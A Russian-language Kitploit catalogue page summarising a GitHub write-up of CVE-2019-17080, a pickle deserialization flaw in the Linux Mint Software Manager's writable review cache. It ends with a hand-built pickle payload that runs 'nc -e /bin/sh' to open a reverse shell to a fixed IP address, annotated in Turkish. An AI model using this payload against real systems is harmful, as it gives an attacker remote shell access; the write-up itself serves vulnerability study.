Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Mintinstall-object-injection — CVE-2019-17080 | Kitploit
Инструменты/GitHubGitHub/materaj2/mintinstall-object-injection
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийCTFОбучение и ОбразованиеЭксплуатация Бинарных Файлов
GitHubmateraj2/mintinstall-object-injection

Mintinstall-object-injection

CVE-2019-17080

Репозиторий
56 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Диспетчер программ Linux Mint (v 7.9.5/9) из-за неправильной конфигурации позволяет выполнить внедрение объектов и произвольный код.

mintinsall

Когда мы запускаем диспетчер программ Mint, он проверяет, есть ли новый комментарий; если есть новый комментарий, он загружает его по адресу new-reviews.list и записывает в файл.

code mintinstall.py

Когда диспетчер программ запускается впервые, он вызывает класс ReviewCache() из модуля reviews.

Как обрабатываются данные?

Как он обрабатывает данные?

code reviews.py

Когда класс ReviewCache запускается (init), он вызывает функцию _load_cache().

Функция Load cache читает файл, находящийся в переменной REVIEWS_CACHE, и с помощью модуля pickle десериализует данные из файла и сохраняет некоторые значения в памяти.

Когда я проверил файл, оказалось, что у меня есть разрешение на запись.

Поскольку с помощью модуля Pickle мы можем выполнять операции сериализации/десериализации, мы можем подключить модуль и выполнить произвольный код, используя метод reduce.

В этом случае, если попытаться десериализовать файл, наш вредоносный код выполнится.

cos 
system 
(S'nc -e /bin/sh 192.168.2.138 4545' 
tR.
>>modül adı c{os}
>> fonksiyon
( >> işaretleyici nesnesi 
S >> tırnak sonuna kadar okuyup stack'e at
tR. >> stackte olanları çagır ve sonucu stacke yerleştir.

alt-text

Скачать инструмент